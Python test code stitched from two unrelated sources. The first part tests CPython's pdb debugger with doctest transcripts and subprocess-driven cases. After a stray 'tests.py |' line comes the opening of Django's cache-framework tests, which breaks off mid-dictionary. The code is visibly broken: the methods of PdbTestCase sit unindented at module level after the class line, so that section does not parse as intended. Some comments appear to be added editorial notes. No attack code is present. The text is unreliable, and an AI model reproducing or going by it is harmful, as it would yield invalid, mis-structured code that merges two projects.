def test_pdb_until_command_for_coroutine():
    # Executable doctest: 'until 8' targets line 8 of test_coro below.
    """Testing no unwindng stack for coroutines
    for "until" command if target breakpoint is not reached
    >>> import asyncio
    >>> async def test_coro():
    ...     print(0)
    ...     await asyncio.sleep(0)
    ...     print(1)
    ...     await asyncio.sleep(0)
    ...     print(2)
    ...     await asyncio.sleep(0)
    ...     print(3)
    >>> async def test_main():
    ...     import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ...     await test_coro()
    >>> def test_function():
    ...     loop = asyncio.new_event_loop()
    ...     loop.run_until_complete(test_main())
    ...     loop.close()
    ...     asyncio.set_event_loop_policy(None)
    ...     print("finished")
    >>> with PdbTestInput(['step',
    ...                    'until 8',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
    -> await test_coro()
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
    -> async def test_coro():
    (Pdb) until 8
    0
    1
    2
    > <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
    -> print(3)
    (Pdb) continue
    3
    finished
    """
def test_pdb_next_command_in_generator_for_loop():
    # Executable doctest: the transcript in the docstring IS the test.
    """The next command on returning from a generator controlled by a for loop.
    >>> def test_gen():
    ...     yield 0
    ...     return 1
    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ...     for i in test_gen():
    ...         print('value', i)
    ...     x = 123
    >>> reset_Breakpoint()
    >>> with PdbTestInput(['break test_gen',
    ...                    'continue',
    ...                    'next',
    ...                    'next',
    ...                    'next',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
    -> for i in test_gen():
    (Pdb) break test_gen
    Breakpoint 1 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
    (Pdb) continue
    > <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
    -> yield 0
    (Pdb) next
    value 0
    > <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
    -> return 1
    (Pdb) next
    Internal StopIteration: 1
    > <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
    -> for i in test_gen():
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
    -> x = 123
    (Pdb) continue
    """
def test_pdb_next_command_subiterator():
    # Executable doctest: the transcript in the docstring IS the test.
    """The next command in a generator with a subiterator.
    >>> def test_subgenerator():
    ...     yield 0
    ...     return 1
    >>> def test_gen():
    ...     x = yield from test_subgenerator()
    ...     return x
    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ...     for i in test_gen():
    ...         print('value', i)
    ...     x = 123
    >>> with PdbTestInput(['step',
    ...                    'step',
    ...                    'next',
    ...                    'next',
    ...                    'next',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
    -> for i in test_gen():
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
    -> def test_gen():
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
    -> x = yield from test_subgenerator()
    (Pdb) next
    value 0
    > <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
    -> return x
    (Pdb) next
    Internal StopIteration: 1
    > <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
    -> for i in test_gen():
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
    -> x = 123
    (Pdb) continue
    """
def test_pdb_issue_20766():
    # Executable doctest: each loop iteration creates a fresh Pdb; the saved
    # SIGINT handler must be the default handler both times (no leak/chain).
    """Test for reference leaks when the SIGINT handler is set.
    >>> def test_function():
    ...     i = 1
    ...     while i <= 2:
    ...         sess = pdb.Pdb()
    ...         sess.set_trace(sys._getframe())
    ...         print('pdb %d: %s' % (i, sess._previous_sigint_handler))
    ...         i += 1
    >>> reset_Breakpoint()
    >>> with PdbTestInput(['continue',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
    -> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
    (Pdb) continue
    pdb 1: <built-in function default_int_handler>
    > <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
    -> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
    (Pdb) continue
    pdb 2: <built-in function default_int_handler>
    """
def test_pdb_issue_43318():
    # Executable doctest: 'clear file:lineno' must echo the deleted
    # breakpoint with the same file:lineno form.
    """echo breakpoints cleared with filename:lineno
    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ...     print(1)
    ...     print(2)
    ...     print(3)
    ...     print(4)
    >>> reset_Breakpoint()
    >>> with PdbTestInput([  # doctest: +NORMALIZE_WHITESPACE
    ...     'break 3',
    ...     'clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3',
    ...     'continue'
    ... ]):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_issue_43318[0]>(3)test_function()
    -> print(1)
    (Pdb) break 3
    Breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
    (Pdb) clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
    Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
    (Pdb) continue
    1
    2
    3
    4
    """
class PdbTestCase(unittest.TestCase):
def tearDown(self):
    # Remove the scratch file (os_helper.TESTFN) that several tests create.
    os_helper.unlink(os_helper.TESTFN)
def _run_pdb(self, pdb_args, commands):
    """Spawn ``python -m pdb`` with *pdb_args*, feed *commands* on stdin.

    Returns a ``(stdout, stderr)`` pair of decoded strings (stderr is
    merged into stdout by the STDOUT redirection).
    """
    # The spawned interpreter may create __pycache__; clean it up afterwards.
    self.addCleanup(os_helper.rmtree, '__pycache__')
    argv = [sys.executable, '-m', 'pdb'] + pdb_args
    env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
    with subprocess.Popen(
        argv,
        stdout=subprocess.PIPE,
        stdin=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        env=env,
    ) as proc:
        out, err = proc.communicate(commands.encode())
    # Decode only non-empty byte strings (mirrors "x and x.decode()").
    out = out.decode() if out else out
    err = err.decode() if err else err
    return out, err
def run_pdb_script(self, script, commands):
    """Run 'script' lines with pdb and the pdb 'commands'."""
    # The name must stay 'main.py': other tests match it in pdb's output.
    script_path = 'main.py'
    with open(script_path, 'w') as stream:
        stream.write(textwrap.dedent(script))
    self.addCleanup(os_helper.unlink, script_path)
    return self._run_pdb([script_path], commands)
def run_pdb_module(self, script, commands):
    """Run *script* as the __main__ of a freshly-built package under pdb."""
    self.module_name = 't_main'
    # Start from a clean slate in case a previous run left the tree behind.
    os_helper.rmtree(self.module_name)
    os.mkdir(self.module_name)
    init_path = self.module_name + '/__init__.py'
    main_path = self.module_name + '/__main__.py'
    with open(init_path, 'w'):
        pass  # empty __init__.py makes the directory a package
    with open(main_path, 'w') as stream:
        stream.write(textwrap.dedent(script))
    self.addCleanup(os_helper.rmtree, self.module_name)
    return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
    """Write *file_content* to TESTFN and check pdb.find_function's result.

    *expected* is either None or a ``(name, lineno)`` pair; the filename
    is inserted here so callers don't repeat it.
    """
    with open(os_helper.TESTFN, 'wb') as stream:
        stream.write(file_content)
    if expected:
        expected = (expected[0], os_helper.TESTFN, expected[1])
    else:
        expected = None
    self.assertEqual(
        expected, pdb.find_function(func_name, os_helper.TESTFN))
def test_find_function_empty_file(self):
    # find_function on an empty file must find nothing (expected=None).
    self._assert_find_function(b'', 'foo', None)
def test_find_function_found(self):
    # The expected line number (4) counts the blank separator line between
    # the function definitions in the file content below.
    self._assert_find_function(
        """\
def foo():
    pass

def bœr():
    pass

def quux():
    pass
""".encode(),
        'bœr',
        ('bœr', 4),
    )
def test_find_function_found_with_encoding_cookie(self):
    # 'bœr' is expected on line 5: cookie line, foo/pass, blank separator.
    # The content is encoded with the cookie's charset on purpose.
    self._assert_find_function(
        """\
# coding: iso-8859-15
def foo():
    pass

def bœr():
    pass

def quux():
    pass
""".encode('iso-8859-15'),
        'bœr',
        ('bœr', 5),
    )
def test_find_function_found_with_bom(self):
    # A UTF-8 BOM prefix must not throw off find_function's line numbering.
    self._assert_find_function(
        codecs.BOM_UTF8 + """\
def bœr():
    pass
""".encode(),
        'bœr',
        ('bœr', 1),
    )
def test_issue7964(self):
    """\r\n line endings in the debugged script must not raise SyntaxError."""
    # Open the file as binary so we can force the \r\n newline verbatim.
    with open(os_helper.TESTFN, 'wb') as stream:
        stream.write(b'print("testing my pdb")\r\n')
    argv = [sys.executable, '-m', 'pdb', os_helper.TESTFN]
    process = subprocess.Popen(
        argv,
        stdout=subprocess.PIPE,
        stdin=subprocess.PIPE,
        stderr=subprocess.STDOUT,
    )
    self.addCleanup(process.stdout.close)
    stdout, stderr = process.communicate(b'quit\n')
    self.assertNotIn(b'SyntaxError', stdout,
                     "Got a syntax error running test script under PDB")
def test_issue13183(self):
    # Stepping out of a function imported from another module must land
    # back in the caller's frame ("main.py(5)foo()->None"). The blank
    # lines in the script below are significant: they put foo's body on
    # line 5 of the dedented main.py.
    script = """
        from bar import bar

        def foo():
            bar()

        def nope():
            pass

        def foobar():
            foo()
            nope()

        foobar()
    """
    commands = """
        from bar import bar
        break bar
        continue
        step
        step
        quit
    """
    bar = """
        def bar():
            pass
    """
    with open('bar.py', 'w') as f:
        f.write(textwrap.dedent(bar))
    self.addCleanup(os_helper.unlink, 'bar.py')
    stdout, stderr = self.run_pdb_script(script, commands)
    self.assertTrue(
        any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
        'Fail to step into the caller after a return')
def test_issue13120(self):
    # Invoking "continue" on a non-main thread triggered an exception
    # inside signal.signal.
    with open(os_helper.TESTFN, 'wb') as f:
        f.write(textwrap.dedent("""
            import threading
            import pdb

            def start_pdb():
                pdb.Pdb(readrc=False).set_trace()
                x = 1
                y = 1

            t = threading.Thread(target=start_pdb)
            t.start()""").encode('ascii'))
    cmd = [sys.executable, '-u', os_helper.TESTFN]
    proc = subprocess.Popen(cmd,
                            stdout=subprocess.PIPE,
                            stdin=subprocess.PIPE,
                            stderr=subprocess.STDOUT,
                            env={**os.environ, 'PYTHONIOENCODING': 'utf-8'}
                            )
    self.addCleanup(proc.stdout.close)
    stdout, stderr = proc.communicate(b'cont\n')
    # Any traceback in the child would contain "Error" in its output.
    self.assertNotIn(b'Error', stdout,
                     "Got an error running test script under PDB")
def test_issue36250(self):
    # Two Pdb instances tracing concurrently (main thread and a worker
    # thread) must not raise; each receives one "cont" command.
    with open(os_helper.TESTFN, 'wb') as f:
        f.write(textwrap.dedent("""
            import threading
            import pdb

            evt = threading.Event()

            def start_pdb():
                evt.wait()
                pdb.Pdb(readrc=False).set_trace()

            t = threading.Thread(target=start_pdb)
            t.start()
            pdb.Pdb(readrc=False).set_trace()
            evt.set()
            t.join()""").encode('ascii'))
    cmd = [sys.executable, '-u', os_helper.TESTFN]
    proc = subprocess.Popen(cmd,
                            stdout=subprocess.PIPE,
                            stdin=subprocess.PIPE,
                            stderr=subprocess.STDOUT,
                            env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
                            )
    self.addCleanup(proc.stdout.close)
    stdout, stderr = proc.communicate(b'cont\ncont\n')
    self.assertNotIn(b'Error', stdout,
                     "Got an error running test script under PDB")
def test_issue16180(self):
    """A syntax error in the debuggee is reported, not swallowed."""
    script = "def f: pass\n"
    commands = ''
    expected = "SyntaxError:"
    stdout, stderr = self.run_pdb_script(script, commands)
    failure_msg = ('\n\nExpected:\n{}\nGot:\n{}\n'
                   'Fail to handle a syntax error in the debuggee.'
                   .format(expected, stdout))
    self.assertIn(expected, stdout, failure_msg)
def test_issue26053(self):
    """The 'run' command of the pdb prompt echoes the new argv it was given."""
    script = "print('hello')"
    commands = """
        continue
        run a b c
        run d e f
        quit
    """
    stdout, stderr = self.run_pdb_script(script, commands)
    # Strip each line so prompt indentation cannot break the regex match.
    stripped_lines = [line.strip() for line in stdout.splitlines()]
    res = '\n'.join(stripped_lines)
    self.assertRegex(res, "Restarting .* with arguments:\na b c")
    self.assertRegex(res, "Restarting .* with arguments:\nd e f")
def test_readrc_kwarg(self):
    # readrc=False must keep pdb from executing the (invalid) .pdbrc this
    # test plants in the current directory.
    script = textwrap.dedent("""
        import pdb; pdb.Pdb(readrc=False).set_trace()

        print('hello')
    """)
    # Drop HOME so a developer's real ~/.pdbrc cannot interfere; restored
    # in the finally block below.
    save_home = os.environ.pop('HOME', None)
    try:
        with os_helper.temp_cwd():
            with open('.pdbrc', 'w') as f:
                f.write("invalid\n")
            with open('main.py', 'w') as f:
                f.write(script)
            cmd = [sys.executable, 'main.py']
            proc = subprocess.Popen(
                cmd,
                stdout=subprocess.PIPE,
                stdin=subprocess.PIPE,
                stderr=subprocess.PIPE,
            )
            with proc:
                stdout, stderr = proc.communicate(b'q\n')
                # Had the rc file been executed, 'invalid' would raise.
                self.assertNotIn(b"NameError: name 'invalid' is not defined",
                                 stdout)
    finally:
        if save_home is not None:
            os.environ['HOME'] = save_home
def test_readrc_homedir(self):
    # Patch os.path.expanduser so pdb's ~/.pdbrc lookup resolves to a temp
    # file; its first line must then show up in Pdb.rcLines.
    save_home = os.environ.pop("HOME", None)
    with os_helper.temp_dir() as temp_dir, patch("os.path.expanduser"):
        rc_path = os.path.join(temp_dir, ".pdbrc")
        os.path.expanduser.return_value = rc_path
        try:
            with open(rc_path, "w") as f:
                f.write("invalid")
            self.assertEqual(pdb.Pdb().rcLines[0], "invalid")
        finally:
            if save_home is not None:
                os.environ["HOME"] = save_home
def test_read_pdbrc_with_ascii_encoding(self):
    # A non-ASCII .pdbrc read under an ASCII-only stdio encoding must
    # surface a UnicodeEncodeError on stderr (the asserted byte offset 21
    # depends on the exact rc content below).
    script = textwrap.dedent("""
        import pdb; pdb.Pdb().set_trace()

        print('hello')
    """)
    save_home = os.environ.pop('HOME', None)
    try:
        with os_helper.temp_cwd():
            with open('.pdbrc', 'w', encoding='utf-8') as f:
                f.write("Fran\u00E7ais")
            with open('main.py', 'w', encoding='utf-8') as f:
                f.write(script)
            cmd = [sys.executable, 'main.py']
            env = {'PYTHONIOENCODING': 'ascii'}
            if sys.platform == 'win32':
                # Force the legacy (encoding-sensitive) console path.
                env['PYTHONLEGACYWINDOWSSTDIO'] = 'non-empty-string'
            proc = subprocess.Popen(
                cmd,
                stdout=subprocess.PIPE,
                stdin=subprocess.PIPE,
                stderr=subprocess.PIPE,
                env={**os.environ, **env}
            )
            with proc:
                stdout, stderr = proc.communicate(b'c\n')
                self.assertIn(b"UnicodeEncodeError: \'ascii\' codec can\'t encode character "
                              b"\'\\xe7\' in position 21: ordinal not in range(128)", stderr)
    finally:
        if save_home is not None:
            os.environ['HOME'] = save_home
def test_header(self):
    """pdb.set_trace(header=...) prints the header before entering."""
    captured = StringIO()
    header = 'Nobody expects... blah, blah, blah'
    with ExitStack() as stack:
        stack.enter_context(patch('sys.stdout', captured))
        # Neutralize the actual trace entry; only the header print matters.
        stack.enter_context(patch.object(pdb.Pdb, 'set_trace'))
        pdb.set_trace(header=header)
    self.assertEqual(captured.getvalue(), header + '\n')
def test_run_module(self):
    """A module run under ``pdb -m`` executes normally after 'continue'."""
    script = """print("SUCCESS")"""
    commands = """
        continue
        quit
    """
    stdout, stderr = self.run_pdb_module(script, commands)
    output_lines = stdout.splitlines()
    self.assertTrue(any("SUCCESS" in line for line in output_lines), stdout)
def test_module_is_run_as_main(self):
    """Under ``pdb -m`` the module must see __name__ == '__main__'."""
    script = """
        if __name__ == '__main__':
            print("SUCCESS")
    """
    commands = """
        continue
        quit
    """
    stdout, stderr = self.run_pdb_module(script, commands)
    output_lines = stdout.splitlines()
    self.assertTrue(any("SUCCESS" in line for line in output_lines), stdout)
def test_breakpoint(self):
    """'b 3' sets a breakpoint under ``pdb -m``; quitting stops before it."""
    script = """
        if __name__ == '__main__':
            pass
            print("SUCCESS")
            pass
    """
    commands = """
        b 3
        quit
    """
    stdout, stderr = self.run_pdb_module(script, commands)
    output_lines = stdout.splitlines()
    # The breakpoint is acknowledged ...
    self.assertTrue(any("Breakpoint 1 at" in line for line in output_lines),
                    stdout)
    # ... and since we quit before continuing, the print never runs.
    self.assertTrue(all("SUCCESS" not in line for line in output_lines),
                    stdout)
def test_run_pdb_with_pdb(self):
    """pdb can debug itself; the usage text must appear in the output."""
    commands = """
        c
        quit
    """
    stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
    output = stdout.replace('\r', '')  # normalize Windows line endings
    self.assertIn(pdb._usage, output)
def test_module_without_a_main(self):
    """Debugging a package lacking __main__.py reports an ImportError."""
    module_name = 't_main'
    os_helper.rmtree(module_name)
    init_file = module_name + '/__init__.py'
    os.mkdir(module_name)
    # Create an empty package: __init__.py only, deliberately no __main__.py.
    with open(init_file, 'w'):
        pass
    self.addCleanup(os_helper.rmtree, module_name)
    stdout, stderr = self._run_pdb(['-m', module_name], "")
    self.assertIn("ImportError: No module named t_main.__main__",
                  stdout.splitlines())
def test_package_without_a_main(self):
    """Running a bare package (no __main__) under pdb is rejected clearly."""
    pkg_name = 't_pkg'
    module_name = 't_main'
    os_helper.rmtree(pkg_name)
    modpath = pkg_name + '/' + module_name
    os.makedirs(modpath)
    with open(modpath + '/__init__.py', 'w'):
        pass
    self.addCleanup(os_helper.rmtree, pkg_name)
    dotted_name = modpath.replace('/', '.')
    stdout, stderr = self._run_pdb(['-m', dotted_name], "")
    self.assertIn(
        "'t_pkg.t_main' is a package and cannot be directly executed",
        stdout)
def test_blocks_at_first_code_line(self):
    """pdb stops on the first *executable* line, skipping comments/blanks."""
    script = """
        #This is a comment, on line 2

        print("SUCCESS")
    """
    commands = """
        quit
    """
    stdout, stderr = self.run_pdb_module(script, commands)
    self.assertTrue(any("__main__.py(4)<module>()" in line
                        for line in stdout.splitlines()), stdout)
def test_relative_imports(self):
    """Relative imports inside a package's __main__ work under `pdb -m`."""
    self.module_name = 't_main'
    os_helper.rmtree(self.module_name)
    main_file = self.module_name + '/__main__.py'
    init_file = self.module_name + '/__init__.py'
    module_file = self.module_name + '/module.py'
    self.addCleanup(os_helper.rmtree, self.module_name)
    os.mkdir(self.module_name)
    with open(init_file, 'w') as f:
        f.write(textwrap.dedent("""
            top_var = "VAR from top"
        """))
    with open(main_file, 'w') as f:
        f.write(textwrap.dedent("""
            from . import top_var
            from .module import var
            from . import module
            pass # We'll stop here and print the vars
        """))
    with open(module_file, 'w') as f:
        f.write(textwrap.dedent("""
            var = "VAR from module"
            var2 = "second var"
        """))
    commands = """
        b 5
        c
        p top_var
        p var
        p module.var2
        quit
    """
    stdout, _ = self._run_pdb(['-m', self.module_name], commands)
    # Fix: pass `stdout` as the assertion message on *every* check (the
    # original only did so for the first), so any failure shows the full
    # pdb transcript instead of a bare "False is not true".
    self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
    self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()), stdout)
    self.assertTrue(any("second var" in l for l in stdout.splitlines()), stdout)
def test_relative_imports_on_plain_module(self):
    """Relative imports also work when pdb runs a plain (non-__main__)
    module inside a package. See bpo32691."""
    self.module_name = 't_main'
    os_helper.rmtree(self.module_name)
    main_file = self.module_name + '/runme.py'
    init_file = self.module_name + '/__init__.py'
    module_file = self.module_name + '/module.py'
    self.addCleanup(os_helper.rmtree, self.module_name)
    os.mkdir(self.module_name)
    with open(init_file, 'w') as f:
        f.write(textwrap.dedent("""
            top_var = "VAR from top"
        """))
    with open(main_file, 'w') as f:
        f.write(textwrap.dedent("""
            from . import module
            pass # We'll stop here and print the vars
        """))
    with open(module_file, 'w') as f:
        f.write(textwrap.dedent("""
            var = "VAR from module"
        """))
    commands = """
        b 3
        c
        p module.var
        quit
    """
    stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
    self.assertTrue(any("VAR from module" in line for line in stdout.splitlines()), stdout)
def test_errors_in_command(self):
    # Errors raised while compiling a command line (or inside the recursive
    # "debug" sub-debugger) must be reported at the prompt, not propagated.
    commands = "\n".join([
        'print(',
        'debug print(',
        'debug doesnotexist',
        'c',
    ])
    stdout, _ = self.run_pdb_script('pass', commands + '\n')
    # Compare the exact transcript (sans the first location line).
    self.assertEqual(stdout.splitlines()[1:], [
        '-> pass',
        '(Pdb) *** SyntaxError: \'(\' was never closed',

        '(Pdb) ENTERING RECURSIVE DEBUGGER',
        '*** SyntaxError: \'(\' was never closed',
        'LEAVING RECURSIVE DEBUGGER',

        '(Pdb) ENTERING RECURSIVE DEBUGGER',
        '> <string>(1)<module>()',
        "((Pdb)) *** NameError: name 'doesnotexist' is not defined",
        'LEAVING RECURSIVE DEBUGGER',
        '(Pdb) ',
    ])
def test_issue34266(self):
    '''do_run handles exceptions from parsing its arg'''
    def check(bad_arg, msg):
        # Feed a malformed `run` argument; pdb must print a clean error.
        commands = f'run {bad_arg}\nq\n'
        stdout, _ = self.run_pdb_script('pass', commands)
        self.assertEqual(stdout.splitlines()[1:], [
            '-> pass',
            f'(Pdb) *** Cannot run {bad_arg}: {msg}',
            '(Pdb) ',
        ])
    check('\\', 'No escaped character')
    check('"', 'No closing quotation')
def test_issue42384(self):
    '''When running `python foo.py` sys.path[0] is an absolute path. `python -m pdb foo.py` should behave the same'''
    script = textwrap.dedent("""
        import sys
        print('sys.path[0] is', sys.path[0])
    """)
    commands = 'c\nq'
    with os_helper.temp_cwd() as cwd:
        # realpath(): the temp cwd may itself be behind a symlink
        # (e.g. /tmp on macOS), and sys.path[0] is fully resolved.
        expected = f'(Pdb) sys.path[0] is {os.path.realpath(cwd)}'
        stdout, stderr = self.run_pdb_script(script, commands)
        # Third output line carries the print; strip \r for Windows.
        self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
@os_helper.skip_unless_symlink
def test_issue42384_symlink(self):
    '''When running `python foo.py` sys.path[0] resolves symlinks. `python -m pdb foo.py` should behave the same'''
    script = textwrap.dedent("""
        import sys
        print('sys.path[0] is', sys.path[0])
    """)
    commands = 'c\nq'
    with os_helper.temp_cwd() as cwd:
        cwd = os.path.realpath(cwd)
        dir_one = os.path.join(cwd, 'dir_one')
        dir_two = os.path.join(cwd, 'dir_two')
        # The real script lives in dir_one; dir_two only holds a symlink,
        # so sys.path[0] must resolve through to dir_one.
        expected = f'(Pdb) sys.path[0] is {dir_one}'
        os.mkdir(dir_one)
        with open(os.path.join(dir_one, 'foo.py'), 'w') as f:
            f.write(script)
        os.mkdir(dir_two)
        os.symlink(os.path.join(dir_one, 'foo.py'), os.path.join(dir_two, 'foo.py'))
        stdout, stderr = self._run_pdb([os.path.join('dir_two', 'foo.py')], commands)
        self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
def test_issue42383(self):
    # The debugged script chdirs into a subdir that contains *another*
    # foo.py: after a restart pdb must re-run the original file, not the
    # same-named file in the new working directory.
    with os_helper.temp_cwd() as cwd:
        with open('foo.py', 'w') as f:
            s = textwrap.dedent("""
                print('The correct file was executed')

                import os
                os.chdir("subdir")
            """)
            f.write(s)

        subdir = os.path.join(cwd, 'subdir')
        os.mkdir(subdir)
        # Nested 'subdir/subdir' so the decoy's own chdir also succeeds.
        os.mkdir(os.path.join(subdir, 'subdir'))
        wrong_file = os.path.join(subdir, 'foo.py')

        with open(wrong_file, 'w') as f:
            f.write('print("The wrong file was executed")')

        # 'c\nc\nq': run to completion, restart (second c), then quit.
        stdout, stderr = self._run_pdb(['foo.py'], 'c\nc\nq')
        expected = '(Pdb) The correct file was executed'
        self.assertEqual(stdout.split('\n')[6].rstrip('\r'), expected)
class ChecklineTests(unittest.TestCase):
    """Tests for Pdb.checkline(), which validates breakpoint line numbers."""

    def setUp(self):
        linecache.clearcache()  # Pdb.checkline() uses linecache.getline()

    def tearDown(self):
        os_helper.unlink(os_helper.TESTFN)

    def test_checkline_before_debugging(self):
        # checkline() must work even before any debugging session starts.
        with open(os_helper.TESTFN, "w") as f:
            f.write("print(123)")
        db = pdb.Pdb()
        self.assertEqual(db.checkline(os_helper.TESTFN, 1), 1)

    def test_checkline_after_reset(self):
        # ...and still work after the debugger state has been reset.
        with open(os_helper.TESTFN, "w") as f:
            f.write("print(123)")
        db = pdb.Pdb()
        db.reset()
        self.assertEqual(db.checkline(os_helper.TESTFN, 1), 1)

    def test_checkline_is_not_executable(self):
        # Comments, docstrings, blank lines and EOF are not breakpointable.
        with open(os_helper.TESTFN, "w") as f:
            # Test for comments, docstrings and empty lines
            s = textwrap.dedent("""
                # Comment
                \"\"\" docstring \"\"\"
                ''' docstring '''
            """)
            f.write(s)
        db = pdb.Pdb()
        num_lines = len(s.splitlines()) + 2  # Test for EOF
        for lineno in range(num_lines):
            self.assertFalse(db.checkline(os_helper.TESTFN, lineno))
def load_tests(loader, tests, pattern):
    """unittest discovery hook: also run this module's doctests."""
    from test import test_pdb
    doctest_suite = doctest.DocTestSuite(test_pdb)
    tests.addTest(doctest_suite)
    return tests
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
tests.py | # -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import copy
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import connection, connections
from django.http import HttpRequest, HttpResponse, StreamingHttpResponse
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import six, timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
# functions/classes for complex data type tests
def f():
    """Module-level function cached as "complex" data by the tests."""
    answer = 42
    return answer
class C:
    """Class cached as "complex" data by the tests.

    NOTE(review): ``m`` takes ``n`` where ``self`` would normally go in the
    original source; the signature is preserved exactly as-is.
    """
    def m(n):
        return 24
class Unpicklable(object):
    """Object whose pickling always fails (for cache serialization tests)."""

    def __getstate__(self):
        # Refuse pickling outright.
        raise pickle.PickleError()
class UnpicklableType(object):
    """Slotted type with no instance __dict__.

    # Unpicklable using the default pickling protocol on Python 2.
    """
    __slots__ = 'a',
@override_settings(CACHES={
    'default': {
        'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
    }
})
class DummyCacheTests(SimpleTestCase):
    # The Dummy cache backend doesn't really behave like a test backend,
    # so it has its own test case.
    # Every test asserts the *absence* of caching: sets are ignored,
    # gets return None (or the supplied default), and key-level
    # operations are no-ops.

    def test_simple(self):
        "Dummy cache backend ignores cache set calls"
        cache.set("key", "value")
        self.assertIsNone(cache.get("key"))

    def test_add(self):
        "Add doesn't do anything in dummy cache backend"
        cache.add("addkey1", "value")
        # add() still reports success even though nothing is stored.
        result = cache.add("addkey1", "newvalue")
        self.assertTrue(result)
        self.assertIsNone(cache.get("addkey1"))

    def test_non_existent(self):
        "Non-existent keys aren't found in the dummy cache backend"
        self.assertIsNone(cache.get("does_not_exist"))
        self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")

    def test_get_many(self):
        "get_many returns nothing for the dummy cache backend"
        cache.set('a', 'a')
        cache.set('b', 'b')
        cache.set('c', 'c')
        cache.set('d', 'd')
        self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
        self.assertEqual(cache.get_many(['a', 'b', 'e']), {})

    def test_delete(self):
        "Cache deletion is transparently ignored on the dummy cache backend"
        cache.set("key1", "spam")
        cache.set("key2", "eggs")
        self.assertIsNone(cache.get("key1"))
        cache.delete("key1")
        self.assertIsNone(cache.get("key1"))
        self.assertIsNone(cache.get("key2"))

    def test_has_key(self):
        "The has_key method doesn't ever return True for the dummy cache backend"
        cache.set("hello1", "goodbye1")
        self.assertFalse(cache.has_key("hello1"))
        self.assertFalse(cache.has_key("goodbye1"))

    def test_in(self):
        "The in operator doesn't ever return True for the dummy cache backend"
        cache.set("hello2", "goodbye2")
        self.assertNotIn("hello2", cache)
        self.assertNotIn("goodbye2", cache)

    def test_incr(self):
        "Dummy cache values can't be incremented"
        cache.set('answer', 42)
        # incr/decr raise because the key was never actually stored.
        self.assertRaises(ValueError, cache.incr, 'answer')
        self.assertRaises(ValueError, cache.incr, 'does_not_exist')

    def test_decr(self):
        "Dummy cache values can't be decremented"
        cache.set('answer', 42)
        self.assertRaises(ValueError, cache.decr, 'answer')
        self.assertRaises(ValueError, cache.decr, 'does_not_exist')

    def test_data_types(self):
        "All data types are ignored equally by the dummy cache"
        stuff = {
            'string': 'this is a string',
            'int': 42,
            'list': [1, 2, 3, 4],
            'tuple': (1, 2, 3, 4),
            'dict': {'A': 1, 'B': 2},
            'function': f,
            'class': C,
        }
